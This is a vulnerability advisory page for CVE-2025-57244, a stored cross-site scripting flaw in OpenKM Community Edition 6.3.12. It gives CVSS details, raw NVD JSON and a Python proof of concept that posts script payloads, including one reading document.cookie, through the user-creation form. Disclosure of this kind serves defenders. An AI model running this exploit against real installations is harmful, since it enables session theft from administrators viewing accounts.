Security Vulnerability Report
中文
CVE-2025-57244 CVSS 5.4 MEDIUM

CVE-2025-57244

Published: 2025-11-05 17:15:45
Last Modified: 2025-11-07 19:48:25
Source: [email protected]

Description

OpenKM Community Edition 6.3.12 is vulnerable to stored cross-site scripting (XSS) in the user account creation interface. The Name field accepts script tags and the Email field is vulnerable when the POST request is modified to include encoded script tags, by passing frontend validation.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openkm:openkm:6.3.12:*:*:*:community:*:*:* - VULNERABLE
OpenKM Community Edition 6.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57244 OpenKM Stored XSS PoC # Affected: OpenKM Community Edition 6.3.12 import requests import urllib.parse target_url = "http://target-ip:8080/OpenKM" login_url = f"{target_url}/j_spring_security_check" create_user_url = f"{target_url}/admin/user" session = requests.Session() # Step 1: Login with low privilege account login_data = { "j_username": "attacker", "j_password": "password" } session.post(login_url, data=login_data) # Step 2: Method 1 - XSS via Name field xss_payload_name = "<script>alert(document.cookie)</script>" user_data_name = { "usr_id": "testuser1", "usr_name": xss_payload_name, "usr_email": "[email protected]", "usr_password": "Test123456", "usr_active": "true" } session.post(create_user_url, data=user_data_name) # Step 3: Method 2 - XSS via Email field (bypass frontend validation) xss_payload_email_encoded = urllib.parse.quote("<script>alert('XSS')</script>") user_data_email = { "usr_id": "testuser2", "usr_name": "Test User", "usr_email": f"test{xss_payload_email_encoded}@example.com", "usr_password": "Test123456", "usr_active": "true" } session.post(create_user_url, data=user_data_email) print("PoC executed. Check if XSS is triggered when viewing user accounts.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57244", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:44.543", "lastModified": "2025-11-07T19:48:25.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenKM Community Edition 6.3.12 is vulnerable to stored cross-site scripting (XSS) in the user account creation interface. The Name field accepts script tags and the Email field is vulnerable when the POST request is modified to include encoded script tags, by passing frontend validation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openkm:openkm:6.3.12:*:*:*:community:*:*:*", "matchCriteriaId": "C1E76DAF-D676-4056-89B9-E8AFF46450E6"}]}]}], "references": [{"url": "https://github.com/wolffangsecurity/CVEs/blob/main/Stored%20XSS%20via%20Input%20Fields%20with%20Inconsistent%20Client-Side%20and%20Server-Side%20Validation%20Writeup.md", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/wolffangsecurity/CVEs/tree/main/CVE-2025-57244", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.